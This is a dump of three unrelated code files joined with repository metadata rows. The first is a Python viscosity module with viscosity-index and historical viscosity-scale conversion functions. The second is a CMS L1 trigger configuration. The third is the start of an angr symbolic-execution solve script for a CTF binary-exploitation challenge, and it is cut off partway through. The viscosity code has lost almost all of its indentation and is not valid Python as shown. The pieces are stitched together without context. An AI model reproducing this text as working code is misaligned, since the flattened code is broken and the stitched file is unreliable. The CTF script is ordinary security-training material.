212.7, 214.4, 216.1, 217.7, 219.4, 221.1, 222.8, 224.5, 226.2, 227.7,
229.5, 233.0, 236.4, 240.1, 243.5, 247.1, 250.7, 254.2, 257.8, 261.5,
264.9, 268.6, 272.3, 275.8, 279.6, 283.3, 286.8, 290.5, 294.4, 297.9,
301.8, 305.6, 309.4, 313.0, 317.0, 320.9, 324.9, 328.8, 332.7, 336.7,
340.5, 344.4, 348.4, 352.3, 356.4, 360.5, 364.6, 368.3, 372.3, 376.4,
380.6, 384.6, 388.8, 393.0, 396.6, 401.1, 405.3, 409.5, 413.5, 417.6,
421.7, 432.4, 443.2, 454.0, 464.9, 475.9, 487.0, 498.1, 509.6, 521.1,
532.5, 544.0, 555.6, 567.1, 579.3, 591.3, 603.1, 615.0, 627.1, 639.2,
651.8, 664.2, 676.6, 689.1, 701.9, 714.9, 728.2, 741.3, 754.4, 767.6,
780.9, 794.5, 808.2, 821.9, 835.5, 849.2, 863.0, 876.9, 890.9, 905.3,
919.6, 933.6, 948.2, 962.9, 977.5, 992.1, 1007.0, 1021.0, 1036.0,
1051.0, 1066.0, 1082.0, 1097.0, 1112.0, 1127.0, 1143.0, 1159.0, 1175.0,
1190.0, 1206.0, 1222.0, 1238.0, 1254.0, 1270.0, 1286.0, 1303.0, 1319.0,
1336.0, 1352.0, 1369.0, 1386.0, 1402.0, 1419.0, 1436.0, 1454.0, 1471.0,
1488.0, 1506.0, 1523.0, 1541.0, 1558.0
]
def viscosity_index(nu_40, nu_100, rounding=False):
    r'''Calculates the viscosity index of a liquid. Requires kinematic viscosity
    of a liquid at 40°C and 100°C. Value may either be returned with or
without rounding. Rounding is performed per the standard.
if nu_100 < 70:
.. math::
L, H = \text{interp}(nu_100)
else:
.. math::
L = 0.8353\nu_{100}^2 + 14.67\nu_{100} - 216
.. math::
H = 0.1684\nu_{100}^2 + 11.85\nu_{100} - 97
if nu_40 > H:
.. math::
        VI = \frac{L-\nu_{40}}{L-H}\cdot 100
else:
.. math::
N = \frac{\ln(H) - \ln(\nu_{40})}{\ln (\nu_{100})}
.. math::
VI = \frac{10^N-1}{0.00715} + 100
Parameters
----------
nu_40 : float
        Kinematic viscosity of fluid at 40°C, [m^2/s]
    nu_100 : float
        Kinematic viscosity of fluid at 100°C, [m^2/s]
rounding : bool, optional
Whether to round the value or not.
Returns
-------
VI: float
Viscosity index [-]
Notes
-----
VI is undefined for nu_100 under 2 mm^2/s. None is returned if this is the
case. Internal units are mm^2/s. Higher values of viscosity index suggest
a lesser decrease in kinematic viscosity as temperature increases.
Note that viscosity is a pressure-dependent property, and that the
viscosity index is defined for a fluid at whatever pressure it is at.
The viscosity index is thus also a function of pressure.
Examples
--------
>>> viscosity_index(73.3E-6, 8.86E-6, rounding=True)
92
References
----------
.. [1] ASTM D2270-10(2016) Standard Practice for Calculating Viscosity
Index from Kinematic Viscosity at 40 °C and 100 °C, ASTM International,
West Conshohocken, PA, 2016, http://dx.doi.org/10.1520/D2270-10R16
'''
nu_40, nu_100 = nu_40*1E6, nu_100*1E6 # m^2/s to mm^2/s
if nu_100 < 2.0:
return None # Not defined for under this
elif nu_100 < 70.0:
L = interp(nu_100, VI_nus, VI_Ls)
H = interp(nu_100, VI_nus, VI_Hs)
else:
L = (0.8353*nu_100 + 14.67)*nu_100 - 216.0
H = (0.1684*nu_100 + 11.85)*nu_100 - 97.0
if nu_40 > H:
VI = (L-nu_40)/(L-H)*100.0
else:
N = (log(H/nu_40))/log(nu_100)
VI = (10**N - 1.0)*(1.0/0.00715) + 100.0
if rounding:
VI = _round_whole_even(VI)
return VI
# All results in units of seconds, except engler and barbey which are degrees
# Data from Hydraulic Institute Handbook
viscosity_scales = {}
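# Each entry maps a list of readings on the named scale to the matching
# kinematic viscosities (second list, in centistokes), so a reading can be
# converted by interpolating between the paired tables.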
SSU_SSU = [31.0, 35.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0, 150.0, 200.0, 250.0, 300.0, 400.0, 500.0, 600.0, 700.0, 800.0, 900.0, 1000.0, 1500.0, 2000.0, 2500.0, 3000.0, 4000.0, 5000.0, 6000.0, 7000.0, 8000.0, 9000.0, 10000.0, 15000.0, 20000.0]
SSU_nu = [1.0, 2.56, 4.3, 7.4, 10.3, 13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['saybolt universal'] = (SSU_SSU, SSU_nu)
SSF_SSF = [12.95, 13.7, 14.44, 15.24, 19.3, 23.5, 28.0, 32.5, 41.9, 51.6, 61.4, 71.1, 81.0, 91.0, 100.7, 150.0, 200.0, 250.0, 300.0, 400.0, 500.0, 600.0, 700.0, 800.0, 900.0, 1000.0, 1500.0, 2000.0]
SSF_nu = [13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['saybolt furol'] = (SSF_SSF, SSF_nu)
SRS_SRS = [29.0, 32.1, 36.2, 44.3, 52.3, 60.9, 69.2, 77.6, 85.6, 128.0, 170.0, 212.0, 254.0, 338.0, 423.0, 508.0, 592.0, 677.0, 762.0, 896.0, 1270.0, 1690.0, 2120.0, 2540.0, 3380.0, 4230.0, 5080.0, 5920.0, 6770.0, 7620.0, 8460.0, 13700.0, 18400.0]
SRS_nu = SSU_nu
viscosity_scales['redwood standard'] = (SRS_SRS, SRS_nu)
SRA_SRA = [5.1, 5.83, 6.77, 7.6, 8.44, 9.3, 10.12, 14.48, 18.9, 23.45, 28.0, 37.1, 46.2, 55.4, 64.6, 73.8, 83.0, 92.1, 138.2, 184.2, 230.0, 276.0, 368.0, 461.0, 553.0, 645.0, 737.0, 829.0, 921.0]
SRA_nu = [4.3, 7.4, 10.3, 13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0]
viscosity_scales['redwood admiralty'] = (SRA_SRA, SRA_nu)
Engler_degrees = [1.0, 1.16, 1.31, 1.58, 1.88, 2.17, 2.45, 2.73, 3.02, 4.48, 5.92, 7.35, 8.79, 11.7, 14.6, 17.5, 20.45, 23.35, 26.3, 29.2, 43.8, 58.4, 73.0, 87.6, 117.0, 146.0, 175.0, 204.5, 233.5, 263.0, 292.0, 438.0, 584.0]
Engler_nu = SSU_nu
viscosity_scales['engler'] = (Engler_degrees, Engler_nu)
# Note: Barbey is decreasing not increasing
Barbey_degrees = [6200.0, 2420.0, 1440.0, 838.0, 618.0, 483.0, 404.0, 348.0, 307.0, 195.0, 144.0, 114.0, 95.0, 70.8, 56.4, 47.0, 40.3, 35.2, 31.3, 28.2, 18.7, 14.1, 11.3, 9.4, 7.05, 5.64, 4.7, 4.03, 3.52, 3.13, 2.82, 2.5, 1.4]
Barbey_nu = SSU_nu
viscosity_scales['barbey'] = (Barbey_degrees, Barbey_nu)
#
PC7_PC7 = [40.0, 46.0, 52.5, 66.0, 79.0, 92.0, 106.0, 120.0, 135.0, 149.0]
PC7_nu = [43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0]
viscosity_scales['parlin cup #7'] = (PC7_PC7, PC7_nu)
PC10_PC10 = [15.0, 21.0, 25.0, 30.0, 35.0, 39.0, 41.0, 43.0, 65.0, 86.0, 108.0, 129.0, 172.0, 215.0, 258.0, 300.0, 344.0, 387.0, 430.0, 650.0, 860.0]
PC10_nu = [65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['parlin cup #10'] = (PC10_PC10, PC10_nu)
PC15_PC15 = [6.0, 7.2, 7.8, 8.5, 9.0, 9.8, 10.7, 11.5, 15.2, 19.5, 24.0, 28.5, 37.0, 47.0, 57.0, 67.0, 76.0, 86.0, 96.0, 147.0, 203.0]
PC15_nu = PC10_nu
viscosity_scales['parlin cup #15'] = (PC15_PC15, PC15_nu)
PC20_PC20 = [3.0, 3.2, 3.4, 3.6, 3.9, 4.1, 4.3, 4.5, 6.3, 7.5, 9.0, 11.0, 14.0, 18.0, 22.0, 25.0, 29.0, 32.0, 35.0, 53.0, 70.0]
PC20_nu = PC10_nu
viscosity_scales['parlin cup #20'] = (PC20_PC20, PC20_nu)
FC3_FC3 = [30.0, 42.0, 50.0, 58.0, 67.0, 74.0, 82.0, 90.0, 132.0, 172.0, 218.0, 258.0, 337.0, 425.0, 520.0, 600.0, 680.0, 780.0, 850.0, 1280.0, 1715.0]
FC3_nu = PC10_nu
viscosity_scales['ford cup #3'] = (FC3_FC3, FC3_nu)
FC4_FC4 = [20.0, 28.0, 34.0, 40.0, 45.0, 50.0, 57.0, 62.0, 90.0, 118.0, 147.0, 172.0, 230.0, 290.0, 350.0, 410.0, 465.0, 520.0, 575.0, 860.0, 1150.0]
FC4_nu = PC10_nu
viscosity_scales['ford cup #4'] = (FC4_FC4, FC4_nu)
MM_MM = [125.0, 145.0, 165.0, 198.0, 225.0, 270.0, 320.0, 370.0, 420.0, 470.0, 515.0, 570.0, 805.0, 1070.0, 1325.0, 1690.0, 2110.0, 2635.0, 3145.0, 3670.0, 4170.0, 4700.0, 5220.0, 7720.0, 10500.0]
MM_nu = [20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['mac michael'] = (MM_MM, MM_nu)
ZC1_ZC1 = [38.0, 47.0, 54.0, 62.0, 73.0, 90.0]
ZC1_nu = [20.6, 32.1, 43.2, 54.0, 65.0, 87.6]
viscosity_scales['zahn cup #1'] = (ZC1_ZC1, ZC1_nu)
ZC2_ZC2 = [18.0, 20.0, 23.0, 26.0, 29.0, 37.0, 46.0, 55.0, 63.0, 72.0, 80.0, 88.0]
ZC2_nu = [20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0]
viscosity_scales['zahn cup #2'] = (ZC2_ZC2, ZC2_nu)
ZC3_ZC3 = [22.5, 24.5, 27.0, 29.0, 40.0, 51.0, 63.0, 75.0]
ZC3_nu = [154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0]
viscosity_scales['zahn cup #3'] = (ZC3_ZC3, ZC3_nu)
ZC4_ZC4 = [18.0, 20.0, 28.0, 34.0, 41.0, 48.0, 63.0, 77.0]
ZC4_nu = [198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0]
viscosity_scales['zahn cup #4'] = (ZC4_ZC4, ZC4_nu)
ZC5_ZC5 = [13.0, 18.0, 24.0, 29.0, 33.0, 43.0, 50.0, 65.0, 75.0, 86.0, 96.0]
ZC5_nu = [220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0]
viscosity_scales['zahn cup #5'] = (ZC5_ZC5, ZC5_nu)
D1_D1 = [1.3, 2.3, 3.2, 4.1, 4.9, 5.7, 6.5, 10.0, 13.5, 16.9, 20.4, 27.4, 34.5, 41.0, 48.0, 55.0, 62.0, 69.0, 103.0, 137.0, 172.0, 206.0, 275.0, 344.0, 413.0, 481.0, 550.0, 620.0, 690.0, 1030.0, 1370.0]
D1_nu = [4.3, 7.4, 10.3, 13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['demmier #1'] = (D1_D1, D1_nu)
D10_D10 = [1.0, 1.4, 1.7, 2.0, 2.7, 3.5, 4.1, 4.8, 5.5, 6.2, 6.9, 10.3, 13.7, 17.2, 20.6, 27.5, 34.4, 41.3, 48.0, 55.0, 62.0, 69.0, 103.0, 137.0]
D10_nu = [32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['demmier #10'] = (D10_D10, D10_nu)
S100_S100 = [2.6, 3.6, 4.6, 5.5, 6.4, 7.3, 11.3, 15.2, 19.0, 23.0, 31.0, 39.0, 46.0, 54.0, 62.0, 70.0, 77.0, 116.0, 154.0, 193.0, 232.0, 308.0, 385.0, 462.0, 540.0, 618.0, 695.0, 770.0, 1160.0, 1540.0]
S100_nu = [7.4, 10.3, 13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['stormer 100g load'] = (S100_S100, S100_nu)
PLF_PLF = [7.0, 8.0, 9.0, 9.5, 10.8, 11.9, 12.4, 16.8, 22.0, 27.6, 33.7, 45.0, 55.8, 65.5, 77.0, 89.0, 102.0, 113.0, 172.0, 234.0]
PLF_nu = [87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['pratt lambert f'] = (PLF_PLF, PLF_nu)
viscosity_scales['kinematic viscosity'] = (SSU_nu, SSU_nu)
viscosity_converters_to_nu = {}
viscosity_converters_from_nu = {}
viscosity_converter_limits = {}
_created_viscosity_converters = False
def _create_viscosity_converters():
global _created_viscosity_converters
from scipy.interpolate import UnivariateSpline
for key, val in viscosity_scales.items():
if key == 'barbey':
continue
values, nus = val
viscosity_converter_limits[key] = (values[0], values[-1], nus[0], nus[-1])
values, nus = np.log(values), np.log(nus)
viscosity_converters_to_nu[key] = UnivariateSpline(values, nus, k=3, s=0)
viscosity_converters_from_nu[key] = UnivariateSpline(nus, values, k=3, s=0)
# Barbey gets special treatment because of its reversed values
viscosity_converter_limits['barbey'] = (Barbey_degrees[-1], Barbey_degrees[0], Barbey_nu[0], Barbey_nu[-1])
barbey_values, barbey_nus = np.log(list(reversed(Barbey_degrees))), np.log(list(reversed(Barbey_nu)))
viscosity_converters_to_nu['barbey'] = UnivariateSpline(barbey_values, barbey_nus, k=3, s=0)
viscosity_converters_from_nu['barbey'] = UnivariateSpline(np.log(Barbey_nu), np.log(Barbey_degrees), k=3, s=0)
_created_viscosity_converters = True
# Originally from Euverard, M. R., "The Efflux Type Viscosity Cup," National
# Paint, Varnish, and Lacquer Association, 9 April 1948; the values below were
# actually taken from the Paint Testing Manual.
# Stored for each scale are (conversion coefficient, minimum valid time in seconds).
# Some of these scales overlap with the tabulated values above; where they do,
# the tabulated values are used in preference.
# Note: Engler viscosity may also be reported in units of time (seconds); a
# confirming reference would be useful.
viscosity_scales_linear = {
'american can': (3.5, 35),
'astm 0.07': (1.4, 60),
'astm 0.10': (4.8, 25),
'astm 0.15': (21, 9),
'astm 0.20': (61, 5),
'astm 0.25': (140, 4),
'a&w b': (18.5, 10),
'a&w crucible': (11.7, 12),
'caspers tin plate': (3.6, 39),
'continental can': (3.3, 12),
'crown cork and seal': (3.3, 12),
'engler': (7.3, 18),
'ford cup #3': (2.4, 34),
'ford cup #4': (3.7, 23),
'murphy varnish': (3.1, 24),
'parlin cup #7': (1.3, 60),
'parlin cup #10': (4.8, 21),
'parlin cup #15': (21.5, 10),
'parlin cup #20': (60, 5),
'parlin cup #25': (140, 15),
'parlin cup #30': (260, 10),
'pratt lambert a': (0.61, 70),
'pratt lambert b': (1.22, 60),
'pratt lambert c': (2.43, 40),
'pratt lambert d': (4.87, 25),
'pratt lambert e': (9.75, 15),
'pratt lambert f': (19.5, 9),
'pratt lambert g': (38, 7),
'pratt lambert h': (76, 5),
'pratt lambert i': (152, 4),
'redwood standard': (0.23, 320),
'saybolt furol': (2.1, 17),
'saybolt universal': (0.21, 70),
'scott': (1.6, 20),
'westinghouse': (3.4, 30),
'zahn cup #1': (0.75, 50),
'zahn cup #2': (3.1, 30),
'zahn cup #3': (9.8, 25),
'zahn cup #4': (12.5, 14),
'zahn cup #5': (23.6, 12)
}
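# Illustrative sketch (added for clarity; not part of the original data): for
# the scales in viscosity_scales_linear the conversion is simply
# nu [cSt] = coefficient * time [s], valid only above the stored minimum time.
_zahn2_coeff, _zahn2_tmin = viscosity_scales_linear['zahn cup #2']
_zahn2_nu_cSt = _zahn2_coeff*45.0  # 45 s on a Zahn cup #2 -> 3.1*45 = 139.5 cSt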
def Saybolt_universal_eq(nu):
return (4.6324*nu + (1E5 + 3264.*nu)/(nu*(nu*(1.646*nu + 23.97)
+ 262.7) + 3930.2))
def viscosity_converter(val, old_scale, new_scale, extrapolate=False):
    r'''Converts kinematic viscosity values between the various scales which have
    historically been used. Though these scales see little modern use, some
    standards still specify values in them.
Parameters
----------
val : float
Viscosity value in the specified scale; [m^2/s] if
'kinematic viscosity'; [degrees] if Engler or Barbey; [s] for the other
scales.
old_scale : str
String representing the scale that `val` is in originally.
new_scale : str
String representing the scale that `val` should be converted to.
extrapolate : bool
If True, a conversion will be performed even if outside the limits of
either scale; if False, and either value is outside a limit, an
exception will be raised.
Returns
-------
result : float
Viscosity value in the specified scale; [m^2/s] if
'kinematic viscosity'; [degrees] if Engler or Barbey; [s] for the other
scales
Notes
-----
The valid scales for this function are any of the following:
['a&w b', 'a&w crucible', 'american can', 'astm 0.07', 'astm 0.10',
'astm 0.15', 'astm 0.20', 'astm 0.25', 'barbey', 'caspers tin plate',
'continental can', 'crown cork and seal', 'demmier #1', 'demmier #10',
'engler', 'ford cup #3', 'ford cup #4', 'kinematic viscosity',
'mac michael', 'murphy varnish', 'parlin cup #10', 'parlin cup #15',
'parlin cup #20', 'parlin cup #25', 'parlin cup #30', 'parlin cup #7',
'pratt lambert a', 'pratt lambert b', 'pratt lambert c', 'pratt lambert d',
'pratt lambert e', 'pratt lambert f', 'pratt lambert g', 'pratt lambert h',
'pratt lambert i', 'redwood admiralty', 'redwood standard',
'saybolt furol', 'saybolt universal', 'scott', 'stormer 100g load',
'westinghouse', 'zahn cup #1', 'zahn cup #2', 'zahn cup #3', 'zahn cup #4',
'zahn cup #5']
Some of those scales are converted linearly; the rest use tabulated data
and splines.
Because the conversion is performed by spline functions, a re-conversion
of a value will not yield exactly the original value. However, it is quite
close.
    The scale 'saybolt universal' has a dedicated formula implemented for its
    conversion, from [4]_. It is designed for maximum backwards compatibility
    with prior experimental data. The formula is inverted numerically (a secant
    iteration) when kinematic viscosity is desired as an output.
.. math::
        SUS_{eq} = 4.6324\nu_t + \frac{1.0 + 0.03264\nu_t}
        {(3930.2 + 262.7\nu_t + 23.97\nu_t^2 + 1.646\nu_t^3)\times 10^{-5}}
Examples
--------
>>> viscosity_converter(8.79, 'engler', 'parlin cup #7')
52.5
>>> viscosity_converter(700, 'Saybolt Universal Seconds', 'kinematic viscosity')
0.00015108914751515542
References
----------
.. [1] Hydraulic Institute. Hydraulic Institute Engineering Data Book.
Cleveland, Ohio: Hydraulic Institute, 1990.
.. [2] Gardner/Sward. Paint Testing Manual. Physical and Chemical
Examination of Paints, Varnishes, Lacquers, and Colors. 13th Edition.
ASTM, 1972.
.. [3] Euverard, M. R., The Efflux Type Viscosity Cup. National Paint,
Varnish, and Lacquer Association, 1948.
.. [4] API Technical Data Book: General Properties & Characterization.
American Petroleum Institute, 7E, 2005.
.. [5] ASTM. Standard Practice for Conversion of Kinematic Viscosity to
Saybolt Universal Viscosity or to Saybolt Furol Viscosity. D 2161 - 93.
'''
if not _created_viscosity_converters:
_create_viscosity_converters()
def range_check(visc, scale):
scale_min, scale_max, nu_min, nu_max = viscosity_converter_limits[scale]
if visc < scale_min*(1.-1E-7) or visc > scale_max*(1.+1E-7):
raise ValueError('Viscosity conversion is outside the limits of the '
'{} scale; given value is {}, but the range of the '
'scale is from {} to {}. Set `extrapolate` to True '
'to perform the conversion anyway.'.format(scale, visc, scale_min, scale_max))
def range_check_linear(val, c, tmin, scale):
if val < tmin:
raise ValueError('Viscosity conversion is outside the limits of the '
'{} scale; given value is {}, but the minimum time '
'for this scale is {} s. Set `extrapolate` to True '
'to perform the conversion anyway.'.format(scale, val, tmin))
old_scale = old_scale.lower().replace('degrees', '').replace('seconds', '').strip()
new_scale = new_scale.lower().replace('degrees', '').replace('seconds', '').strip()
# Convert to kinematic viscosity
if old_scale == 'kinematic viscosity':
val = 1E6*val # convert to centistokes, the basis of the functions
elif old_scale == 'saybolt universal':
if not extrapolate:
range_check(val, old_scale)
to_solve = lambda nu: Saybolt_universal_eq(nu) - val
val = secant(to_solve, 1)
elif old_scale in viscosity_converters_to_nu:
if not extrapolate:
range_check(val, old_scale)
val = exp(viscosity_converters_to_nu[old_scale](log(val)))
elif old_scale in viscosity_scales_linear:
c, tmin = viscosity_scales_linear[old_scale]
if not extrapolate:
range_check_linear(val, c, tmin, old_scale)
val = c*val # convert from seconds to centistokes
else:
keys = sorted(set(list(viscosity_scales.keys()) + list(viscosity_scales_linear.keys())))
raise ValueError(f'Scale "{old_scale}" not recognized - allowable values are any of {keys}.')
# Convert to desired scale
if new_scale == 'kinematic viscosity':
val = 1E-6*val # convert to m^2/s
elif new_scale == 'saybolt universal':
val = Saybolt_universal_eq(val)
elif new_scale in viscosity_converters_from_nu:
val = exp(viscosity_converters_from_nu[new_scale](log(val)))
if not extrapolate:
range_check(val, new_scale)
elif new_scale in viscosity_scales_linear:
c, tmin = viscosity_scales_linear[new_scale]
val = val/c # convert from centistokes to seconds
if not extrapolate:
range_check_linear(val, c, tmin, new_scale)
else:
keys = sorted(set(list(viscosity_scales.keys()) + list(viscosity_scales_linear.keys())))
raise ValueError(f'Scale "{new_scale}" not recognized - allowable values are any of {keys}.')
return float(val)
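# Hedged usage sketch (added; assumes the functions defined above are in scope).
# Conversions through the spline tables are approximately, but not exactly,
# reversible; the values in the comments are rounded.
_nu = viscosity_converter(100.0, 'saybolt universal', 'kinematic viscosity')  # ~2.05e-5 m^2/s (~20.5 cSt)
_back = viscosity_converter(_nu, 'kinematic viscosity', 'saybolt universal')  # ~100 s again
_parlin = viscosity_converter(8.79, 'engler', 'parlin cup #7')  # 52.5 s (tabulated point)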
|
dd8bf1780e93a6c8c695d36a1cfcd3af34645e79
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/L1Trigger/L1ExtraFromDigis/python/l1extraParticles_cfi.py
|
32c704cfa392b0c0bc303d382692f4badfab8510
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 2,542
|
py
|
l1extraParticles_cfi.py
|
import FWCore.ParameterSet.Config as cms
l1extraParticles = cms.EDProducer("L1ExtraParticlesProd",
muonSource = cms.InputTag("gtDigis"),
etTotalSource = cms.InputTag("gctDigis"),
nonIsolatedEmSource = cms.InputTag("gctDigis","nonIsoEm"),
etMissSource = cms.InputTag("gctDigis"),
htMissSource = cms.InputTag("gctDigis"),
produceMuonParticles = cms.bool(True),
forwardJetSource = cms.InputTag("gctDigis","forJets"),
centralJetSource = cms.InputTag("gctDigis","cenJets"),
produceCaloParticles = cms.bool(True),
tauJetSource = cms.InputTag("gctDigis","tauJets"),
isoTauJetSource = cms.InputTag("gctDigis","isoTauJets"),
isolatedEmSource = cms.InputTag("gctDigis","isoEm"),
etHadSource = cms.InputTag("gctDigis"),
hfRingEtSumsSource = cms.InputTag("gctDigis"),
hfRingBitCountsSource = cms.InputTag("gctDigis"),
centralBxOnly = cms.bool(False),
ignoreHtMiss = cms.bool(False)
)
#
# Modify for running with the Stage 1 or Stage 2 trigger
#
from Configuration.Eras.Modifier_stage1L1Trigger_cff import stage1L1Trigger
from Configuration.Eras.Modifier_stage2L1Trigger_cff import stage2L1Trigger
_caloStage1LegacyFormatDigis = "caloStage1LegacyFormatDigis"
_params = dict(
etTotalSource = cms.InputTag(_caloStage1LegacyFormatDigis),
nonIsolatedEmSource = cms.InputTag(_caloStage1LegacyFormatDigis,"nonIsoEm"),
etMissSource = cms.InputTag(_caloStage1LegacyFormatDigis),
htMissSource = cms.InputTag(_caloStage1LegacyFormatDigis),
forwardJetSource = cms.InputTag(_caloStage1LegacyFormatDigis,"forJets"),
centralJetSource = cms.InputTag(_caloStage1LegacyFormatDigis,"cenJets"),
tauJetSource = cms.InputTag(_caloStage1LegacyFormatDigis,"tauJets"),
isoTauJetSource = cms.InputTag(_caloStage1LegacyFormatDigis,"isoTauJets"),
isolatedEmSource = cms.InputTag(_caloStage1LegacyFormatDigis,"isoEm"),
etHadSource = cms.InputTag(_caloStage1LegacyFormatDigis),
hfRingEtSumsSource = cms.InputTag(_caloStage1LegacyFormatDigis),
hfRingBitCountsSource = cms.InputTag(_caloStage1LegacyFormatDigis),
muonSource = cms.InputTag("gtDigis"),
centralBxOnly = True)
stage1L1Trigger.toModify( l1extraParticles, **_params)
stage2L1Trigger.toModify( l1extraParticles, **_params)
# fastsim runs L1Reco and HLT in one step
# this requires setting:
from Configuration.Eras.Modifier_fastSim_cff import fastSim
fastSim.toModify(l1extraParticles, centralBxOnly = True)
|
f63b5b4cfc3d2ea9faf169f8d6777755b37db644
|
e5ba883c7ae6761e119e245d66b01efc41631d97
|
/examples/secuinside2016mbrainfuzz/solve.py
|
8cc9242cbe90d3129615e4f094d617b9ec067424
|
[
"BSD-2-Clause"
] |
permissive
|
angr/angr-doc
|
e40ffb5e68a7f08c1d4aa0e27788b985826ff196
|
bf380700f2baa092c2970a2dceb0eb2793bd9837
|
refs/heads/master
| 2023-08-18T15:55:38.508443
| 2023-04-27T22:54:12
| 2023-04-27T22:54:12
| 40,329,995
| 926
| 595
|
BSD-2-Clause
| 2023-04-12T12:51:06
| 2015-08-06T22:37:54
|
TeX
|
UTF-8
|
Python
| false
| false
| 5,791
|
py
|
solve.py
|
# This example is for Secuinside's mbrainfuzz challenge (2016).
# The challenge handed out binaries that had to be exploited automatically;
# since the service is no longer online, four example binaries obtained
# during the CTF are included with this example.
# The script is based on the writeup at
# https://tasteless.eu/post/2016/07/secuinside-mbrainfuzz/ - the
# difference is that the static analysis part is done with angr instead of r2.
import re
import sys
import angr
import claripy
import subprocess
def static_analyses(p):
print('[*] Analyzing %s...' % p.filename)
#This part is done with r2 in the original writeup.
#However, it is also possible to do the same with angr! :)
to_find, to_avoid, byte_addresses = [], [], []
find_hex_re = re.compile('(0x[0-9a-fA-F]{6})')
#Our main interface for this part will be the cfg. For performance reasons, we use CFGFast
cfg = p.analyses.CFGFast(regions=[(p.loader.main_object.min_addr, p.loader.main_object.max_addr)], force_complete_scan=False)
#As the main function doesn't get identified automatically, let's use a small trick here:
#We take a function which is only called in main (e.g. sscanf) and resolve its predecessor
for address,function in cfg.functions.items():
if function.name == '__isoc99_sscanf' and function.is_plt:
addr = next(iter(cfg.functions.callgraph.predecessors(address)))
break
#Now, let's go down all the way to the target function
while True:
function = cfg.functions[addr]
#First, let's get all call_sites and leave the loop, if there are none
call_sites = function.get_call_sites()
if not len(call_sites):
break
        #Now, let's get the address of the basic block calling the next target function.
        #The sorting and indexing are only relevant for the main function.
calling_block_addr = sorted(call_sites)[-1]
#Resolve the target addr
addr = function.get_call_target(calling_block_addr)
#Since we are already on it, let's apply a dirty heuristic to populate the to_avoid list
#This works because the returning block from the function is at a fixed offset after the call
        #We could also develop a cleaner solution if we didn't use CFGFast() - but this would slow us down
avoid = function.get_call_return(calling_block_addr) + 3
#Last but not least, let's get the addresses of the processed bytes
calling_block = p.factory.block(calling_block_addr)
local_addresses = []
for ins in calling_block.capstone.insns:
m = re.search(find_hex_re,ins.op_str)
if ins.insn_name() == 'movzx' and m:
#The bytes are fetched via rip-relative addressing
local_addresses.append(int(m.group(),16) + ins.size + ins.address)
to_find.append(addr)
to_avoid.append(avoid)
byte_addresses.append(local_addresses)
return to_find, to_avoid, byte_addresses
#pylint:disable=redefined-builtin
def generate_input(p, to_find, to_avoid, byte_addresses):
print('[*] Generating input ....')
byte_map = {}
for i in range(0,len(to_find)-1):
f = to_find[i]
t = to_find[i+1]
#Set up the state for the function we want to solve
e = p.factory.blank_state(addr=f)
rdi = claripy.BVV(0, 56).concat(claripy.BVS('rdi', 8))
rsi = claripy.BVV(0, 56).concat(claripy.BVS('rsi', 8))
rdx = claripy.BVV(0, 56).concat(claripy.BVS('rdx', 8))
rcx = claripy.BVV(0, 56).concat(claripy.BVS('rcx', 8))
e.regs.rdi = rdi
e.regs.rsi = rsi
e.regs.rdx = rdx
e.regs.rcx = rcx
